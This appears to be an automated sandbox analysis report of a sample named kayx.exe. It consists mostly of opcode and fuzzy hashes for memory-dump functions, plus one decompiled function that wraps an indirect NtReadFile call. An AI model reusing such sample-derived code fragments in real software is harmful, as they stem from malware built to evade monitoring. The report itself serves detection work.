Opcode ID: fbbea0c86969b1f43f10e0eb60207fd4d80fba6e0c51c4050b54a148832658f3
Instruction ID: 9e4cb3b7f1fc1fa2e22198f91d01bf1feaa52bec1d5e260498cc21e4766db100
Opcode Fuzzy Hash: fbbea0c86969b1f43f10e0eb60207fd4d80fba6e0c51c4050b54a148832658f3
Instruction Fuzzy Hash: 4B21057110C785CFC3628B28D8683627FB1EF43314F0948AEC442CB6A2D7695D49C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 01851455, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30ea3b06239cf87bfff1579b5a687baed4504665c8d193739ebb0f69e8eaa63e
Instruction ID: 72a5a34ae0a0465de20e4cdfa9d28ff9251f3bb4692397fde78a04754557e7ab
Opcode Fuzzy Hash: 30ea3b06239cf87bfff1579b5a687baed4504665c8d193739ebb0f69e8eaa63e
Instruction Fuzzy Hash: 5721B035304108DFCB80CBAAD988AF97FB2EF44318B0140A1EE15DB661E728EE45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01851898, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179f2266855bcb71ea458a90e3bad786fec6789b58144d8b3e4d69f65aaadefd
Instruction ID: f75ee91a3b6d5cba051018755cf16b2c2b369a2d463fd275bae6fd63aa6961fc
Opcode Fuzzy Hash: 179f2266855bcb71ea458a90e3bad786fec6789b58144d8b3e4d69f65aaadefd
Instruction Fuzzy Hash: E7116D30A0810CCBD7E49A59845CBBEBBF6EB4974CF5540AADC07EB351CA609F008B92

Uniqueness

Uniqueness Score: -1.00%

Function 01854518, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f567f57ce21a2a3b1426f8ea6ea4fa8dc4130f4c185229f1c127404adbe926f
Instruction ID: 55e37c06358ec65a0eeba4d71c21bb0174aa3b66bb2e3ab49f616e5a4811ff78
Opcode Fuzzy Hash: 0f567f57ce21a2a3b1426f8ea6ea4fa8dc4130f4c185229f1c127404adbe926f
Instruction Fuzzy Hash: 1621A5B150C288DFE7A68BA8A4193663FA1E70131DF14825EFA47C6885F7648BC4CB43

Uniqueness

Uniqueness Score: -1.00%

Function 01854528, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ed07d444d18910ef352c1b83fc7e18856c26a1d0128c6fb1c67895bc9bbd47
Instruction ID: ba39ad5decad49bbcdfb7f6254df6b4e6786b85aff95ef93effe099e3ec566fd
Opcode Fuzzy Hash: 48ed07d444d18910ef352c1b83fc7e18856c26a1d0128c6fb1c67895bc9bbd47
Instruction Fuzzy Hash: 2A1184B1508148DBEBB64BA9B00936A3FA5E70131DF04811EFE07C5888F7648BC0CB53

Uniqueness

Uniqueness Score: -1.00%

Function 01851888, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b8fd29a97ae89b6d63b19cc5216c843ed03fbef0d43767ae0700670616c1ecd
Instruction ID: ceaa469a5c841b4f2affa2ceaab2922964af5765c8a5354c8eff46ef48c1f3df
Opcode Fuzzy Hash: 9b8fd29a97ae89b6d63b19cc5216c843ed03fbef0d43767ae0700670616c1ecd
Instruction Fuzzy Hash: 3F119E30A0820DDFDBE59A24801CBBEBBF1EB8934CF51006ADD06EB251CB714F018B92

Uniqueness

Uniqueness Score: -1.00%

Function 018505CF, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9671845298801a75c502760ca8da707e84068fcee76efd2f6a6974f8689657eb
Instruction ID: 320e15a30210cb291c3017d443802341deeae95fe68c30d84d91bb163b79e3cc
Opcode Fuzzy Hash: 9671845298801a75c502760ca8da707e84068fcee76efd2f6a6974f8689657eb
Instruction Fuzzy Hash: 5501DF3150E769CB8BE2222C08212B926E4D68539C76501E3FC83FB652D5518F0183F2

Uniqueness

Uniqueness Score: -1.00%

Function 01850711, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c25b8e2d25ece9e901626fc44f2e64bca44893540a5e98f2a7e3c8d5cd81b6
Instruction ID: 214d4d3fa1e28465d664afb250fc82fe495a05f98153d1bef78945ecd114363b
Opcode Fuzzy Hash: e8c25b8e2d25ece9e901626fc44f2e64bca44893540a5e98f2a7e3c8d5cd81b6
Instruction Fuzzy Hash: 7701223830C209DF87989B7AE8544757BE6EF8034C311416AFD17CB312CB2A9E088F22

Uniqueness

Uniqueness Score: -1.00%

Function 01850890, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e5f807965654f46b391fafa4d255201bc46d9a680907670129c160bb31ccf21
Instruction ID: 5328f1cb26e8f8b584f1a6df8836e5131baff95fc8b1d66acdb6f090cc79dab5
Opcode Fuzzy Hash: 9e5f807965654f46b391fafa4d255201bc46d9a680907670129c160bb31ccf21
Instruction Fuzzy Hash: DF115B74A04209CFEB91DFA8D898AAEBBF1FF49310F208559E811EB364D7349941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 018513A7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e1749e1fedfc228c6a294da578b29d5f47f603210d2710416f874052c8aa7f
Instruction ID: 5d5d83c833b294924f973c195a9d8ac59196fdd36df864367adc0e420cb4db42
Opcode Fuzzy Hash: 66e1749e1fedfc228c6a294da578b29d5f47f603210d2710416f874052c8aa7f
Instruction Fuzzy Hash: CF11C634608248CBD784DB66C898BF97F72EF4030CB055454C902DBA91EB3C9E85C761

Uniqueness

Uniqueness Score: -1.00%

Function 01854A50, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfdf57b63427fceadbf86e56996575c1e84487c62d9ebffdae3fa8ca05409c46
Instruction ID: 6bc021036436ca07a976fd3836a25ed1e35b8ad7fb79e7136838e42d70495da2
Opcode Fuzzy Hash: cfdf57b63427fceadbf86e56996575c1e84487c62d9ebffdae3fa8ca05409c46
Instruction Fuzzy Hash: 7611C234A08349DFD7D5DFAAA40226DBBF2FB81314F14C4AEC906CB225F6358B918B51

Uniqueness

Uniqueness Score: -1.00%

Function 01851CAF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8897f8abf83c7149313d9e838acf1974ade9b4d2979f4c72e1e9de67276f5f32
Instruction ID: 73f04ceaa7353a48572a01ed4d5cab90a5726eea250cb037a571cf2fbac846bf
Opcode Fuzzy Hash: 8897f8abf83c7149313d9e838acf1974ade9b4d2979f4c72e1e9de67276f5f32
Instruction Fuzzy Hash: B711E675108B85CFC3219F29D858362BBB0FF51304F044A6DC5568BAE1D7789A898791

Uniqueness

Uniqueness Score: -1.00%

Function 01850905, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04576c952dbda86e6868808ecc685135d5397f4cd775e7020e110665a505a8b7
Instruction ID: 2121f7ac7f2617186c558d85eae4af6355f7b2b137a3624ee2ebdb7b103b2d46
Opcode Fuzzy Hash: 04576c952dbda86e6868808ecc685135d5397f4cd775e7020e110665a505a8b7
Instruction Fuzzy Hash: 2911D474E15209DFDB90DFA8D998AADBBB1FF48314F208429E812EB324D7309A45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01850640, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3abb0f6fad3bc78e79bad60918baa8db67f8e572dc832da875127232640c9fd8
Instruction ID: fd8f3d2e912b3e30dbe392bda5af647ae91ac19c6a16c26418e818b1e2f62aa8
Opcode Fuzzy Hash: 3abb0f6fad3bc78e79bad60918baa8db67f8e572dc832da875127232640c9fd8
Instruction Fuzzy Hash: 5001FD3420C34DDF83C81A26A80883237A6EAC071D3B041A7FE53CB641EA216E0187B2

Uniqueness

Uniqueness Score: -1.00%

Function 0185487A, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83fb2574ef2b37238e60f639de275f6b78ce4dd55d8097babb3391a18dd09dcc
Instruction ID: c3e807b134d59824da201b3c8d811fb2d528a17c4053b44a7adc7aeb41443f9d
Opcode Fuzzy Hash: 83fb2574ef2b37238e60f639de275f6b78ce4dd55d8097babb3391a18dd09dcc
Instruction Fuzzy Hash: 6C018B39B00144CFE7908B69E458B6933F1EB4632CF1500A9DA06CB261E736DEC5CB02

Uniqueness

Uniqueness Score: -1.00%

Function 01853B70, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba9b9a4b41e39e0517547f902ca3e56edf13a513dd361a375da4eaae4cb2177
Instruction ID: 58c5cf5969f0521c0550c0a2b3992220b6aef0b7536e62b6b497aed7a6a8a893
Opcode Fuzzy Hash: 6ba9b9a4b41e39e0517547f902ca3e56edf13a513dd361a375da4eaae4cb2177
Instruction Fuzzy Hash: E1F09A3520D29CDFC3829A699414871B7A4FE023EC31000AAEE03CB661EAA14E41CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 01855708, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aec998ac16fbb40ea3c7a8ed4591b9035ed42d6337acf92059891b12ddf826a
Instruction ID: 0de313e76f1f1b7be6c49c61b7226df819f817f744934fb864f5cb08d00ca6df
Opcode Fuzzy Hash: 7aec998ac16fbb40ea3c7a8ed4591b9035ed42d6337acf92059891b12ddf826a
Instruction Fuzzy Hash: 08018170A0425ADBEB24CB6AC80476ABFB6EB45710F00C1ADD605E7740DF745A44DF91

Uniqueness

Uniqueness Score: -1.00%

Function 01855710, Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b96fc85635a8b3e32ca137f0dda172acbb24b1d0b8a69c7db50eea40cdde8774
Instruction ID: 3ea6b1a8ad6c9d509845e6cee585e2586fa57cc31b5dd1728cfff0232fa4da16
Opcode Fuzzy Hash: b96fc85635a8b3e32ca137f0dda172acbb24b1d0b8a69c7db50eea40cdde8774
Instruction Fuzzy Hash: 84F0AF70E04259DBEB24CB6AC8047AABFB5EB44320F00C0AEDA05E7740DF740A44DF91

Uniqueness

Uniqueness Score: -1.00%

Function 01856D59, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1e6c3fb75f1a2dfc5470277371f4fd035321cc3e67fe6f8398b4b651f5007d5
Instruction ID: 7dd14991b3c6b398497490b41bbdda974bf6c9dd74bfc2a6a3a9b63be505b20a
Opcode Fuzzy Hash: b1e6c3fb75f1a2dfc5470277371f4fd035321cc3e67fe6f8398b4b651f5007d5
Instruction Fuzzy Hash: D6F089312186414BC324EB39A8584BBB7E7EBD83143458F6DD25A87694DF71980687D0

Uniqueness

Uniqueness Score: -1.00%

Function 018506C1, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba223de75d1ed42e2e4f03994d8ff01843908a39f730903bb64f92931226d379
Instruction ID: c3856f0a2db361b1658b5ad286da7301104a17384d3f9b43a2ae182a7cc02e1d
Opcode Fuzzy Hash: ba223de75d1ed42e2e4f03994d8ff01843908a39f730903bb64f92931226d379
Instruction Fuzzy Hash: 12F0E23520D759EF83959B69A4084267BF5FE953543214186F90ACB225D621AD008BB1

Uniqueness

Uniqueness Score: -1.00%

Function 01851971, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fc3b4cdffe8cda7760027e1a1ece31a2b8a80ffcce6dc6377b341886d19acfe
Instruction ID: 60b43f4745270559b0deb11880ee21869d7adff2949bbd208eaf13d6bd2251d5
Opcode Fuzzy Hash: 1fc3b4cdffe8cda7760027e1a1ece31a2b8a80ffcce6dc6377b341886d19acfe
Instruction Fuzzy Hash: 0AF0A7322046409BD214EB58D88965BF7D7FF88210B41CD3CC34A8F658DF71AC0887E1

Uniqueness

Uniqueness Score: -1.00%

Function 01856D68, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc3574ac008b30921ec140429682ca729e3e3d44bf635a48b4df0ded0f0eac21
Instruction ID: e60b5be104519928dd59f6332d16d3c6848910d4c894a3d829f1de2de05e9791
Opcode Fuzzy Hash: dc3574ac008b30921ec140429682ca729e3e3d44bf635a48b4df0ded0f0eac21
Instruction Fuzzy Hash: 57E0E53121470547C264EA79E84886BB7E7EBC9224345CE2DD35A87694DF71AD0947E0

Uniqueness

Uniqueness Score: -1.00%

Function 01850599, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 801db1f8005ddd90d74758b53620a3b5a8718d922088bed736eda4a46819adcd
Instruction ID: 273a5399b369ce8590a874e91cdf459effce90291f2aba00aae8f4054a37e3ae
Opcode Fuzzy Hash: 801db1f8005ddd90d74758b53620a3b5a8718d922088bed736eda4a46819adcd
Instruction Fuzzy Hash: 08E0ED3140D6C58FD3621778D81912B7FB4EE6232A745509AF483DA026E6600D44C715

Uniqueness

Uniqueness Score: -1.00%

Function 018506D0, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 375626645df75f1b542dfb6062ecbed08aeb6218b338c60648d47a14e6bb90a5
Instruction ID: cdbcd802cc90e1feffe4bd26eaaf2c8d22f1e7e4ed75aba19de2055883ba5399
Opcode Fuzzy Hash: 375626645df75f1b542dfb6062ecbed08aeb6218b338c60648d47a14e6bb90a5
Instruction Fuzzy Hash: 69E04F3524821CDF87889A59A00882B77F8EBC87593304095F907DB314DA719D404B70

Uniqueness

Uniqueness Score: -1.00%

Function 01856DF8, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04c4e5977eb2566f63796b34a0dce358a222b35ad477f677942d29c15b7885d9
Instruction ID: 1434e8f4147221470fd2961687c3b58ceca82e642e080176cf82a03e20f589bb
Opcode Fuzzy Hash: 04c4e5977eb2566f63796b34a0dce358a222b35ad477f677942d29c15b7885d9
Instruction Fuzzy Hash: 80E08C7190A109EBC7D4CE68E9041AAFBAAEF84358B7482999805C2106F3301B206780

Uniqueness

Uniqueness Score: -1.00%

Function 01850983, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af10f1e2373ed72dd0bdf92c4d35e133aaf8e1bc03e05e0295646db3aa406e0a
Instruction ID: f7093a9e920cbb668e59cddb5bcd272e176263d633c0f0e2268c47acfef89308
Opcode Fuzzy Hash: af10f1e2373ed72dd0bdf92c4d35e133aaf8e1bc03e05e0295646db3aa406e0a
Instruction Fuzzy Hash: 11D09E3494531DDFCB51DBA4D8595EDBBB2FF19345B104829E44EEB354D7205E00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01859CB1, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8fa63d727f8307fb2a7044c9d231761cc954c5625ee712f6ff27e7dca35f460
Instruction ID: a32c03d914d929f58267e3ee9fb4a34e041ce973bff1606d20293074df8380df
Opcode Fuzzy Hash: c8fa63d727f8307fb2a7044c9d231761cc954c5625ee712f6ff27e7dca35f460
Instruction Fuzzy Hash: 0DD01236A0855CCFD705DBA8BC601E9F731EB9532AB51C4A7DA1AD7005E6350714CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01850438, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4241f20201f93ebd006a2f1014d957c7c786aa7c4f9dfebc2dedbf92702ebdfa
Instruction ID: 6ceaa52398b4389c4322c9283f00501ac1d6fcd5d66c4bada4fb5d009c1f9729
Opcode Fuzzy Hash: 4241f20201f93ebd006a2f1014d957c7c786aa7c4f9dfebc2dedbf92702ebdfa
Instruction Fuzzy Hash: B1D0122901C6CCDFC3D11368689E63B3F74D61131D32980DEF98FCA057A6548E908757

Uniqueness

Uniqueness Score: -1.00%

Function 01850469, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e267d514301e3f8173560c625a623c3e905493663ee83cccfd2a3a390e041b09
Instruction ID: e6acc580e450d1b8fed53af3b7e599d67fab1f592feb6e1da1cac99352df10f3
Opcode Fuzzy Hash: e267d514301e3f8173560c625a623c3e905493663ee83cccfd2a3a390e041b09
Instruction Fuzzy Hash: 32D0222A90450CAF079036FCCC461277FB8E13031CB8846B8BC6AC2202E52C8B0246C1

Uniqueness

Uniqueness Score: -1.00%

Function 01856E08, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2ff8753f98c5a717c72ed86f94a52a0589434305465ede3a0ac19bbcfab4aa8
Instruction ID: c63eac203a1a5b17f9608848b38dc5806e1b194b727e3dcee384e94cf98d05c1
Opcode Fuzzy Hash: d2ff8753f98c5a717c72ed86f94a52a0589434305465ede3a0ac19bbcfab4aa8
Instruction Fuzzy Hash: C5D0C771D0610DEF4BD4CE55D905469B7B9E784358770C5A59C05D3114F6311F107690

Uniqueness

Uniqueness Score: -1.00%

Function 018505A8, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7db32ef90739ddf7995209a91ed95299f4a17b588c3447c8d4900467886a30
Instruction ID: dea6ef1305846923f98767223f61eb633256c72b95eaa2e08b642713786a2259
Opcode Fuzzy Hash: cd7db32ef90739ddf7995209a91ed95299f4a17b588c3447c8d4900467886a30
Instruction Fuzzy Hash: 92C00234048548CBC3603B70F90E22F7BA8FA4032BB419068F547D2439AE311E91CB59

Uniqueness

Uniqueness Score: -1.00%

Function 01850C0B, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f9ccd8b941d11801bb45fb94f884fff5bdd103e5e778b5057c43d186ca28518
Instruction ID: 8c8347890c8790d51adc661b9a7d967fb5802f515254294cbf98810886137c8e
Opcode Fuzzy Hash: 8f9ccd8b941d11801bb45fb94f884fff5bdd103e5e778b5057c43d186ca28518
Instruction Fuzzy Hash: 84C08030414314CFD7548735CC554553770FE463A430544D4FC02DB154DB301914D710

Uniqueness

Uniqueness Score: -1.00%

Function 01850448, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a647d5ac8f1f2282f9a246924666d089175c4730f4412e5361830ed59e8024ab
Instruction ID: 92683cb9451332a55c4bea060100f936beb3b945553eb149a5f2a82a8f1a66de
Opcode Fuzzy Hash: a647d5ac8f1f2282f9a246924666d089175c4730f4412e5361830ed59e8024ab
Instruction Fuzzy Hash: 60C0923804C54CCF47D42694749E23B3FB8D50072E7058049FD4FC941A6B609BA08B67

Uniqueness

Uniqueness Score: -1.00%

Function 01857408, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 923d228aa64dfa95cffa076aa71fd57acfe25ef4d9e17009db6cf4ae6f6df58a
Instruction ID: a4475161898979e57b0815a2bd6788f47f68cfa1ea5b80b92ce49dbebcc91042
Opcode Fuzzy Hash: 923d228aa64dfa95cffa076aa71fd57acfe25ef4d9e17009db6cf4ae6f6df58a
Instruction Fuzzy Hash: 53C00278A00158DFCB10CBC4D984D9DBBB1EF4C321F518155A8069B369D630EC81CF00

Uniqueness

Uniqueness Score: -1.00%

Function 01854418, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.352095293.0000000001850000.00000040.00000001.sdmp, Offset: 01850000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f82f642f28e78d9ebf3562c44138652c7190c0a8836359f5a3817ffd5b14c12
Instruction ID: aa8a6de592f60dd25effae8e489c4b1d73b3869a5476df476f4e70693cee611e
Opcode Fuzzy Hash: 8f82f642f28e78d9ebf3562c44138652c7190c0a8836359f5a3817ffd5b14c12
Instruction Fuzzy Hash: 34B012300453019DC6079A24501040075A1FEC02463E08368C24044B104737B011CB80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05C42987, Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f54acf58bdc35bb4d2764f0e78ab83a22d5a30438c53a94e23ad742cd718a07
Instruction ID: d5764a9ba9f5667cb7f11c5a9853d37ecf0aadd704b3d592cd384af4e426ce53
Opcode Fuzzy Hash: 7f54acf58bdc35bb4d2764f0e78ab83a22d5a30438c53a94e23ad742cd718a07
Instruction Fuzzy Hash: 04A16C35A105289FCB14DF68D989BADB7F2FF48304F1185A8E419EB250DB70AD85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05C46D10, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9818844a354fab07cdf82221149eeb646fc5f6336c618b95cdbc0ab5425c362b
Instruction ID: 16f74899e253c630b3a2a65066afca769126c371b04fff032a92f64b688f23ac
Opcode Fuzzy Hash: 9818844a354fab07cdf82221149eeb646fc5f6336c618b95cdbc0ab5425c362b
Instruction Fuzzy Hash: 71817275A05119CBDB24CF9AC444FAEB7F2FB86308F088D2AD54697648C378A9C5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05C46D00, Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3362dd0fd54b5f76d699bae08d8a54dc2d28a781f576fba0c3ae7c996f29e7c9
Instruction ID: cf4d955dc62d592504190554267486662f3e33f3dfdadb9bc47aab24894697d3
Opcode Fuzzy Hash: 3362dd0fd54b5f76d699bae08d8a54dc2d28a781f576fba0c3ae7c996f29e7c9
Instruction Fuzzy Hash: 89816275A05219CBDB24CF8AC484FAEB7F2FB85308F148D2AD546A7648C378A9C5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 05C426B1, Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b09a73b48190b9b36586beac3bec82d5963a9445454225775632f3f6c0708ba
Instruction ID: 4467e6b6730a979c34319da1ec3d33d57c94a68b4cb6f38a6083bd518954f2f9
Opcode Fuzzy Hash: 8b09a73b48190b9b36586beac3bec82d5963a9445454225775632f3f6c0708ba
Instruction Fuzzy Hash: FA519E71A242448FDB08DFBBE84569A7BF3FBC8204B08C429D5099F624EFB56C468B54

Uniqueness

Uniqueness Score: -1.00%

Function 05C426C0, Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.356109220.0000000005C40000.00000040.00000001.sdmp, Offset: 05C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 297ef4ec5ed0a1c75662b49684e3687f501c0a091cef575ab45ee4c48a1b0192
Instruction ID: d162c5c6264ee53fa86dba583cbad665ed625756376519ccc5d1925f9218a7d5
Opcode Fuzzy Hash: 297ef4ec5ed0a1c75662b49684e3687f501c0a091cef575ab45ee4c48a1b0192
Instruction Fuzzy Hash: 6551BF71A142448FDB08DFBBE84569A7BF3FBC8204B08C439D5099F624EFB56C468B54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kayx.exe PID: 6900 Parent PID: 6524 kayx.exeCOMMON

Executed Functions

Function 00417C40, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00417C40(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418790(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413732
				_t12 =  &_a8; // 0x413732
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00417c43
0x00417c4f
0x00417c57
0x00417c62
0x00417c7d
0x00417c85
0x00417c89

APIs

NtReadFile.NTDLL(27A,5EB6D251,FFFFFFFF,004133F1,?,?,27A,?,004133F1,FFFFFFFF,5EB6D251,00413732,?,00000000), ref: 00417C85

Strings

27A, xrefs: 00417C62, 00417C70
27A, xrefs: 00417C7D, 00417C84

Memory Dump Source

